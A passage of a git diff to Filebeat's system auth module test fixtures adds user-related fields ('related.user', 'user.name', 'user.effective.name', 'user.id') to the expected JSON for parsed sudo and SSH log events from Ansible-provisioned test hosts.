"vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-fnthqelgspkbnpnxlsknzcbyxbqqxpmt; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675204.07-135388534337396/command; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675204.07-135388534337396/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -341,7 +415,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -357,7 +438,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -374,7 +459,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -403,13 +492,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-wagdvfiuqxtryvmyrqlfcwoxeqqrxejt; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675206.28-198308747142204/async_wrapper 321853834469 45 /home/vagrant/.ansible/tmp/ansible-tmp-1486675206.28-198308747142204/command /home/vagrant/.ansible/tmp/ansible-tmp-1486675206.28-198308747142204/arguments; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675206.28-198308747142204/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -426,7 +517,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -442,7 +540,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -459,7 +561,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -475,13 +581,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-lkgydmrwiywdfvxfoxmgntufiumtzpmq; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675212.66-81790186240643/command; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675212.66-81790186240643/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -498,7 +606,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -514,7 +629,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -531,7 +650,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -547,13 +670,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-mjsapklbglujaoktlsyytirwygexdily; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675218.96-234174787135180/command; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675218.96-234174787135180/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -570,7 +695,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -586,7 +718,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -603,7 +739,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -619,13 +759,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-kvmafqtdnnvnyfyqlnoovickcavkqwdy; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675219.83-99205535237718/setup; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675219.83-99205535237718/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -642,7 +784,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -658,7 +807,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -675,7 +828,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -691,13 +848,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-nhrnwbdpypmsmvcstuihfqfbcvpxrmys; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675224.58-12467498973476/get_url; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675224.58-12467498973476/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -714,7 +873,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -730,7 +896,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -747,7 +917,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -763,13 +937,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-buzartmsbrirxgcoibjpsqjkldihhexh; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675228.25-195852789001210/get_url; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675228.25-195852789001210/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -786,7 +962,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -802,7 +985,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -819,7 +1006,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -835,13 +1026,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-swwkpvmnxhcuduxerfbgclhsmgbhwzie; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675247.78-128146395950020/command; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675247.78-128146395950020/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -858,7 +1051,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -874,7 +1074,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -891,7 +1095,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -907,13 +1115,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-raffykohamlcbnpxzipksbvfpjbfpagy; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675250.82-190689706060358/apt; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675250.82-190689706060358/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -930,7 +1140,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -946,7 +1163,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -963,7 +1184,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -979,13 +1204,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-dfoxiractbmtavfiwfnhzfkftipjumph; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675251.6-137767038423665/apt; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675251.6-137767038423665/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1002,7 +1229,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1018,7 +1252,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1035,7 +1273,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1051,13 +1293,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-jveaoynmhsmeodakzfhhaodihyroxobu; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675261.29-208287411335817/file; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675261.29-208287411335817/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1074,7 +1318,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1090,7 +1341,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1106,13 +1361,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-lwzhcvorajmjyxsrqydafzapoeescwaf; rc=flag; [ -r /etc/metricbeat/metricbeat.yml ] || rc=2; [ -f /etc/metricbeat/metricbeat.yml ] || rc=1; [ -d /etc/metricbeat/metricbeat.yml ] && rc=3; python -V 2>/dev/null || rc=4; [ x\"$rc\" != \"xflag\" ] && echo \"${rc} \"/etc/metricbeat/metricbeat.yml && exit 0; (python -c 'import hashlib; BLOCKSIZE = 65536; hasher = hashlib.sha1();#012afile = open(\"'/etc/metricbeat/metricbeat.yml'\", \"rb\")#012buf = afile.read(BLOCKSIZE)#012while len(buf) > 0:#012#011hasher.update(buf)#012#011buf = afile.read(BLOCKSIZE)#012afile.close()#012print(hasher.hexdigest())' 2>/dev/null) || (python -c 'import sha; BLOCKSIZE = 65536; hasher = sha.sha();#012afile = open(\"'/etc/metricbeat/metricbeat.yml'\", \"rb\")#012buf = afile.read(BLOCKSIZE)#012while len(buf) > 0:#012#011hasher.update(buf)#012#011buf = afile.read(BLOCKSIZE)#012afile.close()#012print(hasher.hexdigest())' 2>/dev/null) || (echo '0 ", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1145,7 +1402,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1161,7 +1425,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1178,7 +1446,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1195,7 +1467,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1211,13 +1487,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-yesyhegdrhiolusidthffdemrxphqdfm; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675262.15-83340738940485/copy; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675262.15-83340738940485/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1234,7 +1512,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1250,7 +1535,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1267,7 +1556,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1283,13 +1576,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-vqbyiylfjufyxlwvxcwusklrtmiekpia; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675263.16-15325827909434/service; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675263.16-15325827909434/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1306,7 +1601,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1322,7 +1624,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1339,7 +1645,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1355,13 +1665,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-osrbplljwskuafamtjuanhwfxqdxmfbj; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675264.47-179299683847940/wait_for; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675264.47-179299683847940/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1378,7 +1690,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1394,7 +1713,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1411,7 +1734,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1427,13 +1754,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-xqypdfdxashhaekghbfnpdlcgsmfarmy; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675265.39-273766954542007/service; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675265.39-273766954542007/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1450,7 +1779,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1466,7 +1802,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1483,7 +1823,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1499,13 +1843,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-ktkmpxhjivossxngupfgrqfobhopruzp; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675266.58-47565152594552/apt; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675266.58-47565152594552/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1522,7 +1868,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1538,7 +1891,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1555,7 +1912,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1571,13 +1932,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-erpqyqrmifxazcclvbqytjwxgdplhtpy; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675275.74-155140815824587/file; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675275.74-155140815824587/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1594,7 +1957,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1610,7 +1980,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1627,7 +2001,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1643,13 +2021,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-cfqjebskszjdqpksprlbjpbttastwzyp; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675276.62-248748589735433/get_url; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675276.62-248748589735433/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1666,7 +2046,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1682,7 +2069,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1699,7 +2090,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1715,13 +2110,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-oxbowrzvfhsebemuiblilqwvdxvnwztv; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675280.28-272460786101534/get_url; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675280.28-272460786101534/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1738,7 +2135,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1754,7 +2158,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1771,7 +2179,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1787,13 +2199,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-ohlhhhazvtawqawluadjlxglowwenmyc; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675302.51-201837201796085/command; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675302.51-201837201796085/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" } ] \ No newline at end of file diff --git a/filebeat/module/system/auth/test/secure-rhel7.log-expected.json b/filebeat/module/system/auth/test/secure-rhel7.log-expected.json index 50134594bfcc..d6319b0e82a1 100644 --- a/filebeat/module/system/auth/test/secure-rhel7.log-expected.json +++ b/filebeat/module/system/auth/test/secure-rhel7.log-expected.json @@ -59,7 +59,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -121,7 +125,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -251,7 +259,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -313,7 +325,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -375,7 +391,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -437,7 +457,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -499,7 +523,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -629,7 +657,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -663,7 +695,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -725,7 +761,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -787,7 +827,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -849,7 +893,11 